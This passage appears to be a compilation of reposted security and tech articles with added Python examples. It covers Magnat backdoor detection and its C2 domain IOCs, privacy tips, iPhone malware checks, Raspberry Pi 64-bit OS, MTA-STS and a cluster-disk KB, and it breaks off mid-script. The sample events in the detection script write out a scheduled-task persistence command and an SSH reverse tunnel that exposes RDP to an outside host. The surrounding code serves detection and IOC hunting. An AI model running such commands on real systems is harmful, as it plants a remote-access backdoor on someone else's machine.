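    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 15 /tn "Updater" /tr "C:\ProgramData\svc\run.exe" /f',
     "ParentImage": r"C:\Users\bob\AppData\Local\Temp\setup_autoit.exe"},
    {"Image": r"C:\ProgramData\svc\ssh.exe",
     "CommandLine": "ssh.exe -N -o StrictHostKeyChecking=no -R 0.0.0.0:41000:127.0.0.1:3389 tunnel@203.0.113.7 -p 443",
     "ParentImage": r"C:\ProgramData\svc\run.exe"},
    {"Image": r"C:\Windows\System32\OpenSSH\ssh.exe",  # benign local forward: must not fire
     "CommandLine": "ssh -L 8080:intranet:80 dev@jump.corp.example",
     "ParentImage": r"C:\Windows\System32\WindowsTerminal.exe"},
]


def match_rules(event: Dict[str, str]) -> List[str]:
    """Names of every rule whose pattern hits the event's command line."""
    cmd = event.get("CommandLine", "")
    return [name for name, rx in RULES if rx.search(cmd)]


def triage(events: List[Dict[str, str]]) -> Tuple[List[Tuple[str, str, List[str]]], str]:
    """Per-event findings (parent, image, rules) plus a verdict. A reverse tunnel to 3389 is
    suspicious on its own; together with RDP being switched on or opened in the firewall it is
    the staging pattern the post describes."""
    findings, fired = [], set()
    for ev in events:
        names = match_rules(ev)
        if names:
            findings.append((ev["ParentImage"], ev["Image"], names))
            fired.update(names)
    staging = {"rdp_enabled_via_registry", "firewall_opened_for_rdp"}
    if "rdp_reverse_ssh_tunnel" in fired and fired & staging:
        verdict = "rdp_backdoor_staging"
    elif "rdp_reverse_ssh_tunnel" in fired:
        verdict = "suspicious_rdp_tunnel"
    else:
        verdict = "no_pattern"
    return findings, verdict


if __name__ == "__main__":
    found, verdict = triage(EVENTS)
    for parent, image, names in found:
        print(f"{image} (parent {parent}): {', '.join(names)}")
    print("verdict:", verdict)
```

The rules deliberately key on the target of the -R forward rather than on ssh.exe itself, since administrators use SSH port forwarding legitimately (the last event); correlating the tunnel with the registry and firewall changes from the same installer is what separates staging from noise.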

Magnat BackDoor Spotlight: Cisco Talos recently observed a malicious campaign offering fake installers of popular software as bait to get users to execute the malware on their systems. This campaign includes a set of malware distribution campaigns that started in late 2018 and have targeted Canada, the U.S., Australia, and some European Union countries. Two undocumented malware families (a BackDoor and a Google Chrome extension) are consistently delivered together in these campaigns. An unknown actor with the alias “magnat” is likely the author of these new families and has consistently developed and improved them. The attacker’s motivations appear to be financial gain from selling stolen credentials, executing fraudulent transactions, and providing Remote Desktop Access to systems.

Target Geolocations: Canada, U.S., Australia, E.U. Countries
Target Data: Credentials, Sensitive Data
Target Businesses: Any

MITRE ATT&CK for Magnat BackDoor

Initial Access:
Malvertising
Persistence:
Scheduled Task/Job
Execution:
Scheduled Task/Job
Defense Evasion:
Impair Defenses: Disable or Modify System Firewall
Deobfuscate/Decode Files or Information
Command and Control:
Application Layer Protocol
Exfiltration:
Exfiltration Over Command and Control Channel

IOCs

Domains (Active)

chocolatepuma[.]casa
wormbrainteam[.]club
430lodsfb[.]xyz
softstatistic[.]xyz
happyheadshot[.]club
aaabasick[.]fun
nnyearhappy[.]club
teambrainworm[.]club
yanevinovat[.]club
fartoviypapamojetvse[.]club
hugecarspro[.]space
burstyourbubble[.]icu
boogieboom[.]host
cgi-lineup[.]website
newdawnera[.]fun
bhajhhsy6[.]site
iisnbnd7723hj[.]digital
sdcdsujnd555w[.]digital
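The indicators above are published defanged ([.]) so they cannot be clicked by accident; before they can be matched against telemetry they have to be refanged, and the match has to be label-aware so that a look-alike such as notchocolatepuma.casa is not mistaken for chocolatepuma.casa. The following Python, an example added here rather than Cisco’s tooling, loads the list above, refangs it and hunts through BIND-style query log lines. The log lines and the 10.0.0.0/8 client addresses are constructed.

```python
import re

# The "Domains (Active)" list above, exactly as published (defanged with [.]).
DEFANGED_IOCS = """
chocolatepuma[.]casa
wormbrainteam[.]club
430lodsfb[.]xyz
softstatistic[.]xyz
happyheadshot[.]club
aaabasick[.]fun
nnyearhappy[.]club
teambrainworm[.]club
yanevinovat[.]club
fartoviypapamojetvse[.]club
hugecarspro[.]space
burstyourbubble[.]icu
boogieboom[.]host
cgi-lineup[.]website
newdawnera[.]fun
bhajhhsy6[.]site
iisnbnd7723hj[.]digital
sdcdsujnd555w[.]digital
"""

# Constructed BIND-style query log lines (querylog format, with and without the @0x client
# pointer newer BIND versions print). Clients and timestamps are placeholders.
SAMPLE_DNS_LOG = """
09-Feb-2022 10:14:33.120 client 10.0.0.12#53211 (cdn.softstatistic.xyz): query: cdn.softstatistic.xyz IN A + (10.0.0.1)
09-Feb-2022 10:14:34.002 client 10.0.0.12#53212 (www.example.com): query: www.example.com IN A + (10.0.0.1)
09-Feb-2022 10:15:01.555 client @0x7f3c1c0a1e60 10.0.0.40#61000 (teambrainworm.club): query: teambrainworm.club IN A + (10.0.0.1)
09-Feb-2022 10:15:02.100 client 10.0.0.40#61001 (notchocolatepuma.casa): query: notchocolatepuma.casa IN A + (10.0.0.1)
"""

QUERY_LINE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<src>[\d.]+)#\d+ .*?: query: (?P<qname>\S+) IN ")


def refang(indicator):
    """Undo the usual defanging conventions so the indicator matches live data."""
    return (indicator.strip().lower()
            .replace("[.]", ".").replace("(.)", ".").replace("{.}", ".")
            .replace("hxxp", "http"))


def load_iocs(text):
    return {refang(line) for line in text.splitlines() if line.strip()}


def matching_ioc(qname, iocs):
    """Label-aware match: the IOC itself or any subdomain of it, never a substring."""
    labels = qname.rstrip(".").lower().split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in iocs:
            return candidate
    return None


def hunt(log_text, iocs):
    """Return (client, queried name, matched IOC) for every query touching an IOC."""
    hits = []
    for line in log_text.splitlines():
        m = QUERY_LINE.search(line)
        if m:
            ioc = matching_ioc(m["qname"], iocs)
            if ioc:
                hits.append((m["src"], m["qname"], ioc))
    return hits


if __name__ == "__main__":
    for src, qname, ioc in hunt(SAMPLE_DNS_LOG, load_iocs(DEFANGED_IOCS)):
        print(f"{src} resolved {qname} (matches IOC {ioc})")
```

Matching on whole labels rather than with a substring search is the detail that matters: C2 infrastructure is often reached through a subdomain of the listed apex, which this catches, while an unrelated name that merely ends in the same characters is left alone.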

Additional Information:

Magnat campaigns use malvertising to deliver information stealer, backdoor and malicious Chrome extension

Which Cisco Products Can Block:
Cisco Secure Endpoint
Cisco Secure Firewall/Secure IPS
Cisco Secure Malware Analytics
Cisco Umbrella


[1] While Cisco products can protect against RDP BackDoor and Information Stealer, they do not protect against Chrome Extension Installers

Source :
https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-emotet-redline-stealer-magnat-backdoor

Why You Need to Care About Data Privacy & 5 Tips for Better Data Security

The privacy of our data has always been important. However, because we’re sharing more of it than ever before, being aware of data privacy and taking the necessary steps to protect it has never been more crucial. In this article, in celebration of Data Privacy Week, we cover why data privacy is so important, what can happen if your data were to fall into the wrong hands, and what you can do to protect your personal data.


What is data privacy and why is it important?

Data privacy often refers to the practice of handling sensitive data in line with regulatory requirements. In most developed countries, there are specific data privacy laws in place that regulate how companies can collect, store, and share customer data.

While the EU has a comprehensive data privacy law, the General Data Protection Regulation (GDPR), which covers all different types of data, only three US states currently have similar, all-encompassing data privacy laws (California, Virginia, and Colorado). Instead, the US has many different laws designed to target specific types of data. For example, the Fair Credit Reporting Act (FCRA) protects information in your credit report, and the Family Educational Rights and Privacy Act (FERPA) protects students’ education reports from being freely accessible.

However, because of how much time we spend online nowadays, we’re putting more of our personal data out there for others to see than ever before. As a result, it is not only important to understand how protected your data is when you share it with a company, but also how private it is when you share it online.

How to protect your data privacy

Here are some of our top tips for data privacy protection:

  1. Only give your data to trustworthy companies and websites — Perhaps you’ve come across a new online clothing store or seen an app on the app store that takes your fancy, but you’re unsure whether the company can be trusted. If you’ve never heard of it before, do some quick research before handing over any data.
  2. Think twice before sharing — With social media being such a big part of our everyday lives, it’s easy to forget that what we post online can stay online forever. Always think twice before sharing something, and never publicly share personal information such as your address, phone number, or social security number.
  3. Take advantage of privacy settings — On every website, app, and game you use, make sure you’re taking advantage of the built-in privacy settings, so that only people you know can view your information.
  4. Use strong passwords and enable 2FA — When you create an online account, you almost always need to share personal data such as your full name, email address, and date of birth. That data isn’t public, but anyone who gets into the account can see it. Use a strong, unique password for every account so that one leaked password cannot be replayed elsewhere, and enable two-factor authentication (2FA) wherever it is offered.
  5. Use a VPN on public Wi-Fi — Open Wi-Fi networks are notoriously insecure. Because no password is needed to join them, anyone nearby can join too and capture whatever traffic is not encrypted by the application itself (HTTPS protects most web traffic, but not every app, and the names of the sites you visit are still visible). A VPN wraps all of your traffic in one encrypted tunnel, so use one on public Wi-Fi networks.

Data leaks in 2021 — T-Mobile, LinkedIn, Moncler & CoinMarketCap

The truth is, no matter how well a company abides by data privacy laws and how thoroughly it protects its customers’ data, it can never be 100% leak-proof. In 2021 alone, a shocking number of companies suffered high-profile data leaks, including T-Mobile, LinkedIn, Moncler, and CoinMarketCap. Those leaks exposed the sensitive personal data of hundreds of millions of people, data that criminals use to commit all sorts of crimes, the most concerning of which is identity theft.

According to the Federal Trade Commission, there were over 1 million reports of identity theft in 2021. Below are some of the things the FTC says criminals can do with your data:

  • Get new credit cards in your name.
  • Open a phone, electricity, or gas account in your name.
  • Steal your tax refund.
  • Get medical care under your name (and leave you with a huge bill!).
  • Pretend to be you if they get arrested.

Cybercriminals often put stolen data up for sale on underground forums on the regular internet, as well as the dark web. And as you can imagine, personal information that is particularly valuable to them can fetch a high price. On average, on the dark web, a driver’s license will go for $205, an ID card for $213, and a passport sells for a whopping $684!

How to stay protected from data leaks

You might be thinking that staying protected from data leaks is an impossible task, but the answer is easy: Trend Micro™ ID Security. Available for Android and iOS, Trend Micro™ ID Security can scan the internet and the dark web 24/7 for your personal information. If your data is leaked, the app notifies you immediately so you can take action before anyone can use it to steal your identity. If your information is out there, you’ll be the first to know!

Here are some of the features offered by Trend Micro™ ID Security:

  • Personal Data Protection Score — See exactly how safe your online personal data is with your customized Protection Score.
  • 24/7 Comprehensive Personal Data Monitoring — ID Security can scan the internet and the dark web for all your personal information including up to 5 email addresses and bank account numbers, 10 credit card numbers, your Social Security number, and lots more.
  • Social Media Account Protection — Strengthen the security of your social media accounts. Be instantly alerted if your Facebook or Twitter account’s data is leaked by cybercriminals.

To learn more about Trend Micro™ ID Security and claim your free 30-day trial, click the button below.

Source :
https://news.trendmicro.com/2022/01/27/why-you-need-to-care-about-data-privacy-5-tips-for-better-data-security/

How to Detect Malware on iPhone — 5 Steps

Have you noticed your iPhone behaving a little strangely recently? Maybe you’ve been bombarded by unusual ads or your battery has been hitting 0% much more quickly than normal. If you’ve got your suspicions that your iPhone has a malware infection, keep on reading to learn how to know for sure!

Step #1 — Check for high data usage

One particularly big sign of a malware infection is if your iPhone is using much more data than normal. Follow the instructions below to check:

  1. Go to either Settings > Cellular or Settings > Mobile Data (the label depends on the region your iPhone is set to, not on the iOS version).
  2. You will then be able to check exactly how much data you’ve used in the current period. If it is significantly higher than you’re used to, search through the list of apps and look for any that you don’t recognize or remember installing. If any of them are using up a lot of data, you should strongly consider deleting them because they could be malicious.

Step #2 — Check for battery-hogging apps 

Some forms of malware can run in the background without you even being aware of it, consuming huge amounts of your iPhone’s resources and having a significant impact on how long its battery lasts. As a result, similar to an increase in data usage, a sudden increase in battery usage is another red flag that indicates that your iPhone may have a problem. Here’s how you can check:

  1. Navigate to Settings and select Battery.
  2. Choose either Last 24 hours or Last 10 Days.
  3. You can now see every app’s battery usage during the selected time period. Just like checking for high data usage, if you see any unusual apps that are using up a lot of battery, you should delete them.

Step #3 — Check for strange apps

Malware comes in many varieties. Many strains consume a lot of battery and data, but not all do, so you also need to go through every app installed on your iPhone and look for ones you don’t recognize.

This may take a while if you have installed a lot of apps, but remove every unfamiliar one you find.

Step #4 — Constantly being bothered by pop-ups?

If you’re always being bombarded by ads every time you surf the web on your iPhone, it’s a very strong sign that it has been infected by adware, which is a particular form of malware. Although it is generally considered one of the less dangerous types of malware, it can still be very annoying. If you’re suffering from this issue, but you were unable to find any malicious apps while following the previous steps, you should move on to the next step.

Step #5 — Run a malware scan

If you were unable to find any malware-infected apps by following the previous steps and your iPhone is still behaving unusually, you need to run a malware scan. Trend Micro Mobile Security works perfectly for this!

Trend Micro Mobile Security can protect you against malicious apps, ransomware, dangerous websites, unsafe Wi-Fi networks, and more. Ridding your iPhone of malware simply couldn’t be any easier! Click the button below to download.

Some of Trend Micro Mobile Security’s features include:

  • Surf anywhere — Prevent mobile apps from loading dangerous and risky websites when you browse.
  • Stop threats — Rely on the cloud-based Smart Protection Network™ and Mobile App Reputation technology to stop threats before they can reach you.
  • Avoid online scams and fraud — Flag malicious phishing emails and scam websites.
  • Improve performance — Take advantage of optimization features to make your mobile devices work better.

Source :
https://news.trendmicro.com/2022/01/26/how-to-detect-malware-on-iphone-5-steps/

Raspberry Pi OS (64-bit)

Over the past year, we’ve been trialling a beta of Raspberry Pi OS in glorious 64-bit. Now it’s time to open it up to a wider audience.

raspberry pi os 64-bit

The ARMv8-A architecture, which encompasses the 64-bit AArch64 architecture and associated A64 instruction set, was first introduced into the Raspberry Pi line with Raspberry Pi 3 in 2016. From that point on, it has been possible to run a full 64-bit operating system on our flagship products, and many third-party operating systems are available. However, we have continued to build our Raspberry Pi OS releases on the 32-bit Raspbian platform, aiming to maximise compatibility between devices and to avoid customer confusion.

Product              Processor   ARM core     Debian/Raspbian ARM port (maximum)   Architecture width
Raspberry Pi 1       BCM2835     ARM1176      arm6hf                               32 bit
Raspberry Pi 2       BCM2836     Cortex-A7    armhf                                32 bit
Raspberry Pi Zero    BCM2835     ARM1176      arm6hf                               32 bit
Raspberry Pi Zero 2  BCM2710     Cortex-A53   arm64                                64 bit
Raspberry Pi 3       BCM2710     Cortex-A53   arm64                                64 bit
Raspberry Pi 4       BCM2711     Cortex-A72   arm64                                64 bit

As you can see from the table above, it is easy to be confused about which products will support which Debian/Raspbian ports. Using arm6hf (Raspbian’s derivative of armhf with ARMv7-only instructions removed but floating-point instructions retained) provides us with an operating system which will run on every device we have ever manufactured, all the way back to 2011.

But we’ve come to realise that there are reasons to choose a 64-bit operating system over a 32-bit one. Compatibility is a key concern: many closed-source applications are only available for arm64, and open-source ones aren’t fully optimised for the armhf port. Beyond that there are some performance benefits intrinsic to the A64 instruction set: today, these are most visible in benchmarks, but the assumption is that these will feed through into real-world application performance in the future.

A more theoretical concern is that 32-bit pointers only allow you to address 4GB of memory. On Raspberry Pi 4, we use the ARM Large Physical Address Extension (LPAE) to access up to 8GB of memory, subject to the constraint that any process is limited to accessing 3GB (we reserve the top 1GB of the virtual address space for the kernel). Very few processes require more memory than this: happily Chromium, which is probably the most memory-intensive application in Raspberry Pi OS, spawns a process per tab. But some use cases will benefit from being able to allocate the entire memory of an 8GB Raspberry Pi 4 from a single process.
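To make the address-space point concrete, here is a small Python script (added for this page, not Raspberry Pi’s code) that asks the kernel for a large PROT_NONE reservation without committing any RAM, so the answer reflects the per-process virtual address limit rather than installed memory: on the 32-bit OS a 3 GiB request will normally fail even on an 8 GB Raspberry Pi 4, because the 3 GB user space is already partly occupied by libraries, whereas on the 64-bit OS it succeeds. It is Linux-only and assumes the arm/arm64/x86 values of the mmap flags; the list of probe sizes is arbitrary.

```python
import ctypes
import struct
import sys

PTR_BITS = 8 * struct.calcsize("P")   # 32 on armhf/arm6hf, 64 on arm64

# Linux mmap constants (identical on arm, arm64 and x86; see <sys/mman.h>).
PROT_NONE = 0
MAP_PRIVATE, MAP_ANONYMOUS, MAP_NORESERVE = 0x02, 0x20, 0x4000


def can_reserve(nbytes):
    """Try to reserve nbytes of virtual address space without committing RAM.

    PROT_NONE + MAP_NORESERVE hands out address range only, so this probes the
    per-process address-space limit, not free memory. Returns True/False, or None
    on non-Linux systems where the constants above do not apply.
    """
    if not sys.platform.startswith("linux"):
        return None
    if nbytes >= 1 << PTR_BITS:            # size not even representable in a pointer
        return False
    libc = ctypes.CDLL(None, use_errno=True)   # symbols of the running process (libc included)
    libc.mmap.restype = ctypes.c_void_p
    libc.mmap.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int,
                          ctypes.c_int, ctypes.c_int, ctypes.c_long]
    libc.munmap.argtypes = [ctypes.c_void_p, ctypes.c_size_t]
    addr = libc.mmap(None, nbytes, PROT_NONE,
                     MAP_PRIVATE | MAP_ANONYMOUS | MAP_NORESERVE, -1, 0)
    map_failed = (1 << PTR_BITS) - 1       # MAP_FAILED is (void *)-1
    if addr is None or addr == map_failed:
        return False
    libc.munmap(addr, nbytes)
    return True


def largest_reservable_gib(candidates=(1, 2, 3, 4, 6, 8, 16)):
    """Largest of the candidate sizes (GiB) that a single process can map."""
    best = 0
    for gib in candidates:
        if can_reserve(gib << 30):
            best = gib
    return best


if __name__ == "__main__":
    print(f"{PTR_BITS}-bit process: largest probe reservation {largest_reservable_gib()} GiB")
```

Run it once on a 32-bit and once on a 64-bit Raspberry Pi OS install on the same board: the 32-bit result stops at 2 GiB regardless of how much RAM is fitted, the 64-bit one runs past 16 GiB because the limit is the virtual address space, not physical memory.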

The 64-bit build of Chromium, which is installed by default, has no WidevineCDM library available, so it cannot play DRM-protected streaming media such as Netflix or Disney+. To switch to the 32-bit build instead, run the following in a terminal window:

sudo apt install chromium-browser:armhf libwidevinecdm0

To return to the 64-bit build (the trailing minus sign tells apt to remove libwidevinecdm0 in the same operation):

sudo apt install chromium-browser:arm64 libwidevinecdm0-

So, head to the downloads page and grab your copy of 64-bit Raspberry Pi OS today. Let us know in the comments if your use case benefits (or suffers!) from the move to 64-bit.

Source :
https://www.raspberrypi.com/news/raspberry-pi-os-64-bit/

Microsoft Office 365 boosts email security against MITM, downgrade attacks

Microsoft has added SMTP MTA Strict Transport Security (MTA-STS) support to Exchange Online to ensure Office 365 customers’ email communication integrity and security.

Redmond first announced MTA-STS’ introduction in September 2020, after revealing that it was also working on adding inbound and outbound support for DNSSEC (Domain Name System Security Extensions) and DANE for SMTP (DNS-based Authentication of Named Entities).

“We have been validating our implementation and are now pleased to announce support for MTA-STS for all outgoing messages from Exchange Online,” the Exchange Online Transport Team said today.

With MTA-STS now available in Office 365, emails sent by users via Exchange Online will only be delivered using connections with both authentication and encryption, protecting the messages from interception and attack attempts.

This new standard strengthens Exchange Online email security and addresses several long-standing SMTP weaknesses, including expired TLS certificates, receiving servers that do not support secure protocols at all, and certificates that were not issued by a trusted authority or do not match the server’s domain name. A sending server previously had to tolerate all of these, because it had no way to learn what the receiving domain actually expected.

Before MTA-STS, emails sent through improperly secured TLS connections were exposed to various attacks, including downgrade and man-in-the-middle attacks.

“Downgrade attacks are possible where the STARTTLS response can be deleted, thus rendering the message in cleartext. Man-in-the-middle (MITM) attacks are also possible, whereby the message can be rerouted to an attacker’s server,” the Exchange team said.

“MTA-STS (RFC8461) helps thwart such attacks by providing a mechanism for setting domain policies that specify whether the receiving domain supports TLS and what to do when TLS can’t be negotiated, for example stop the transmission.”

Microsoft provides guidance on how to adopt MTA-STS, including where to host the policy file on your domain’s web infrastructure.
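To show what the policy Microsoft refers to actually looks like and how a sending MTA acts on it, here is a Python example added for this page (not Microsoft’s or Exchange Online’s code) that follows the RFC 8461 rules: the _mta-sts TXT record, the policy file served at https://mta-sts.<domain>/.well-known/mta-sts.txt, wildcard MX matching, and the deliver-or-defer decision when STARTTLS has been stripped or the certificate does not check out. The domain, policy id and policy body are constructed around the reserved example.com and example.net names.

```python
# Constructed _mta-sts.example.com TXT record and policy body; not any real domain's policy.
STS_TXT_RECORD = "v=STSv1; id=20220209T120000Z"

POLICY_TEXT = """version: STSv1
mode: enforce
mx: mail.example.com
mx: *.backup.example.net
max_age: 604800
"""

MAX_AGE_LIMIT = 31557600   # RFC 8461: max_age is capped at one year (in seconds)


def parse_sts_record(txt):
    """Parse the _mta-sts.<domain> TXT record; return the policy id, or None if not STSv1.
    A changed id is the sender's cue to re-fetch the policy over HTTPS."""
    fields = dict(kv.strip().split("=", 1) for kv in txt.split(";") if "=" in kv)
    if fields.get("v") != "STSv1" or not fields.get("id"):
        return None
    return fields["id"]


def parse_policy(text):
    """Parse the mta-sts.txt body and reject anything a sender should not trust."""
    policy = {"mx": []}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "mx":
            policy["mx"].append(value.lower())
        else:
            policy[key] = value
    if policy.get("version") != "STSv1":
        raise ValueError("unsupported policy version")
    if policy.get("mode") not in ("enforce", "testing", "none"):
        raise ValueError("mode must be enforce, testing or none")
    if "max_age" not in policy:
        raise ValueError("max_age is required")
    policy["max_age"] = int(policy["max_age"])
    if not 0 <= policy["max_age"] <= MAX_AGE_LIMIT:
        raise ValueError("max_age out of range")
    return policy


def mx_matches(policy, mx_host):
    """RFC 8461 section 4.1: a leading '*' matches exactly one leftmost label."""
    host = mx_host.rstrip(".").lower()
    for pattern in policy["mx"]:
        if pattern.startswith("*."):
            suffix = pattern[1:]                       # ".backup.example.net"
            prefix = host[:-len(suffix)] if host.endswith(suffix) else ""
            if prefix and "." not in prefix:
                return True
        elif host == pattern:
            return True
    return False


def delivery_decision(policy, mx_host, starttls_offered, cert_valid_for_mx):
    """What a sending MTA does with one candidate MX under the policy:
    'deliver', 'defer' (try another MX, then queue) or 'deliver-report'
    (testing mode: deliver anyway and report the failure via TLSRPT)."""
    secure = mx_matches(policy, mx_host) and starttls_offered and cert_valid_for_mx
    if secure:
        return "deliver"
    if policy["mode"] == "enforce":
        return "defer"
    if policy["mode"] == "testing":
        return "deliver-report"
    return "deliver"          # mode none: behave as if no policy existed


if __name__ == "__main__":
    policy = parse_policy(POLICY_TEXT)
    print("policy id:", parse_sts_record(STS_TXT_RECORD))
    print("STARTTLS stripped on mail.example.com ->",
          delivery_decision(policy, "mail.example.com", False, False))
    print("MX rerouted to evil.example.org ->",
          delivery_decision(policy, "evil.example.org", True, True))
```

The two printed cases are the attacks the Exchange team describes: a stripped STARTTLS banner and a rerouted MX both end in "defer" under an enforce policy, whereas before MTA-STS the sender would have happily continued in cleartext or to the wrong host. Publishing in testing mode first, with a TLSRPT address to collect the reports, is the usual way to find misconfigured MX certificates before switching to enforce.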

DANE for SMTP support also rolling out

Redmond is still working on rolling out DANE for SMTP (with DNSSEC support), which provides better protection for SMTP connections than MTA-STS does.

“We will deploy support for DANE for SMTP and DNSSEC in two phases. The first phase, DANE and DNSSEC for outbound email (from Exchange Online to external destinations), is slowly being deployed between now and March 2022. We expect the second phase, support for inbound email, to start by the end of 2022,” said the Exchange Team on Tuesday.

“We’ve been working on support for both MTA-STS and DANE for SMTP. At the very least, we encourage customers to secure their domains with MTA-STS,” Microsoft added today.

“You can use both standards on the same domain at the same time, so customers are free to use both when Exchange Online offers inbound protection using DANE for SMTP by the end of 2022. By supporting both standards, you can account for senders who may support only one method.”

Microsoft has already secured several domains it uses for email transport as a domain owner itself, including primary domains like outlook.com, hotmail.com, and live.com. 

This ensures that all connections from senders who support MTA-STS are better protected from man-in-the-middle attacks. 

Source :
https://www.bleepingcomputer.com/news/microsoft/office-365-boosts-email-security-against-mitm-downgrade-attacks/

Microsoft Windows 10 optional updates fix performance problems introduced last month

Optional updates for Windows 10 and Windows 11 released in January have fixed performance problems when playing games, using the operating system, or even opening folders in File Explorer.

With the January 2022 updates, Microsoft introduced numerous bugs breaking L2TP VPN connections, causing domain controller reboots, and preventing Hyper-V from working.

Microsoft later released out-of-band updates to fix these issues, whose fixes were also rolled into the optional preview updates.

However, these optional updates seem to have fixed more than the reported bugs, as they are also resolving significant performance issues caused by the January updates.

Recent Windows updates caused performance hits

After installing the January 2022 KB5009543 update, Windows 10 users began to notice that Windows suffered from severe performance issues.

These performance issues included slow boots and slow response times when opening the Start Menu, launching apps, playing games, and performing pretty much all of the basic functions of the operating system. In general, Windows felt “laggy” after installing the updates.

“Prior to the update, it took maybe 2 minutes for my laptop to boot to the home screen. It now takes close to a half hour. I’m frustrated to the point where I’m now planning to disable updates and uninstall this update,” a user named Ninja_Bobcat posted on Reddit.

“This update has ruined my laptop in games, namely warzone and apex. Goes to 0 fps and huge stutters everywhere,” another person posted.

“My computer is incredibly slow after KB5009543 security update and KB5008876 windows update. It takes about 3 minutes for my computer to boot and maybe 2-3 minutes to open a tab on chrome. Absolutely killed my computer,” said a third Windows 10 user.

BleepingComputer replicated these performance issues after installing the January 2022 KB5009543 update on multiple laptops.

The good news is that BleepingComputer found that installing the optional KB5009596 preview update released late last month fixed these newly introduced performance issues.

Windows 10 KB5009596 optional update

However, as these updates are optional, many users will not know to install them. Thus, their performance issues will continue until the mandatory February 2022 Patch Tuesday updates are installed, which will include these fixes.

Windows users can install the optional updates by going into Settings, clicking on Windows Update, and manually performing a ‘Check for Updates.’

As this is an optional update, you will need to install KB5009596 by clicking on the ‘Download and install’ link.

Windows 11 issues were fixed as well

Not to be outdone by Windows 10, Windows 11 has also been dealing with performance issues within File Explorer.

Users found that it was slow to switch between folders, browse folders, or select files when using File Explorer.

However, the optional Windows 11 KB5008353 cumulative update preview has resolved these issues, with users reporting that File Explorer is back to normal.

“I honestly lost hope because this issue has been there since I upgraded to Win11, other users were claiming it was solved but it wasn’t the case for everyone. However, this update seems to have fixed this issue for good amongst others of course,” a Windows 11 user posted on Reddit.

BleepingComputer has not been able to replicate the performance issues on Windows 11 to test the fix.

BleepingComputer has also reached out to Microsoft with further questions about what has been fixed but has not received a reply as of yet.

Source :
https://www.bleepingcomputer.com/news/microsoft/windows-10-optional-updates-fix-performance-problems-introduced-last-month/

A physical disk resource may not come online on a Microsoft cluster node

This article helps solve an issue where a physical disk resource doesn’t come online on a cluster node.

Applies to:   Windows Server 2012 R2
Original KB number:   981475

Symptoms

On a cluster node that is running Windows Server, a physical disk resource may enter the Failed state when you try to move a group that contains the physical disk resource. If you restart the cluster node that has the physical disk resource that did not come online, the problem is temporarily resolved.

When this problem occurs, the following entries are logged in the Cluster log for the physical disk resource that entered the failed state:

000020cc.000014d0::<DateTime> ERR Physical Disk <Disk Q:>:
DiskspCheckPath: GetFileAttrs(Q:) returned status of 87.
000020cc.000014d0::<DateTime> WARN Physical Disk <Disk Q:>:
DiskspCheckDriveLetter: Checking drive name (Q:) returns 87

Additionally, the following events are logged in the System Event log:

Event Type: Error
Event Source: ClusSvc
Event Category: Physical Disk Resource
Event ID: 1066
Date: <date>
Time: <time>
User: N/A
Computer: <node name>
Description: Cluster disk resource “Disk Q:” is corrupt. Run ‘ChkDsk /F’ to repair problems. The volume name for this resource is “<\\?\Volume{4323d41e-1379-11dd-9538-001e0b20dfe6}>”. If available, ChkDsk output will be in the file “C:\WINDOWS\Cluster\ChkDsk_Disk2_SigB05E593B.log”. ChkDsk may write information to the Application Event Log with Event ID 26180.

Event Type: Error
Event Source: ClusSvc
Event Category: Physical Disk Resource
Event ID: 1035
Date: <date>
Time: <time>
User: N/A
Computer: <node name>
Description: Cluster disk resource ‘Disk Q:’ could not be mounted.

Similarly, on a Windows Server cluster node you may see the following entries logged in the Cluster log:

00000db0.00000868::<DateTime> WARN [RES] Physical Disk <Cluster Disk 1>: OnlineThread: Failed to get volume guid for device \\?\GLOBALROOT\Device\Harddisk15\Partition1. Error 3
00000db0.00000868::<DateTime> WARN [RES] Physical Disk <Cluster Disk 1>: OnlineThread: Failed to set volguid \??\Volume{3cb36133-0d0b-11df-afcf-005056ab58b9}. Error: 183.
00000db0.00000868::<DateTime> INFO [RES] Physical Disk <Cluster Disk 1>: VolumeIsNtfs: Volume \\?\GLOBALROOT\Device\Harddisk15\Partition1\ has FS type NTFS

Cause

This problem is known to occur when antivirus software that is not cluster-aware is installed, upgraded, or reconfigured. For example, this problem is known to occur after you install or migrate to Symantec Endpoint Protection 11.0 Release Update 5 (RU5) on the cluster nodes.

Resolution

To resolve this problem, follow these steps:

  1. Verify that this problem is caused by Symantec Endpoint Protection (SEP) 11.0 Release Update 5 (RU5). To do this, run the Handle.exe utility immediately after the issue occurs, on the cluster node where the physical disk resource did not come online. At an elevated command prompt, type the following command, and then press ENTER:

     Handle.exe -a -u drive_letter

     Note: The drive_letter placeholder is the drive designation for the cluster drive that did not come online. For example, if the cluster drive that did not come online is drive Q, type the following command, and then press ENTER:

     Handle.exe -a -u Q:

     The problem is caused by the Symantec application if you receive output like the following, which identifies the Smc.exe process as the owner of the handle:

     Handle v3.42
     Copyright (C) 1997-2008 Mark Russinovich
     Sysinternals – www.sysinternals.com

     Smc.exe pid: 856 NT AUTHORITY\SYSTEM 66C: Q:
  2. If the problem is caused by the Symantec application, contact Symantec to obtain Symantec Endpoint Protection 11 Release Update 6 (RU6), which was released to resolve this issue.
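Handle.exe output is easy to eyeball for one drive but tedious across several nodes; the following Python (an added example, not part of the Microsoft KB or of Sysinternals) parses Handle.exe -a -u output, keeps the handles that sit on the failed cluster drive and names the culprit when the owning image is on a list of products known not to be cluster-aware. The output is constructed: the Smc.exe line mirrors the KB’s example and the other entries are made up, and the product list is an assumption containing only the KB’s Symantec case.

```python
import re

# Constructed Handle.exe -a -u output. The Smc.exe line mirrors the KB's example; the other
# two entries are made up so the filter has something to ignore.
SAMPLE_HANDLE_OUTPUT = r"""
Handle v3.42
Copyright (C) 1997-2008 Mark Russinovich
Sysinternals - www.sysinternals.com

Smc.exe pid: 856 NT AUTHORITY\SYSTEM 66C: Q:
svchost.exe pid: 1204 NT AUTHORITY\SYSTEM 3A8: C:\Windows\System32
clussvc.exe pid: 2332 NT AUTHORITY\SYSTEM 7F0: \Device\Harddisk15\Partition1
"""

# process, pid, owning user (may contain spaces), hex handle value, object path
HANDLE_LINE = re.compile(
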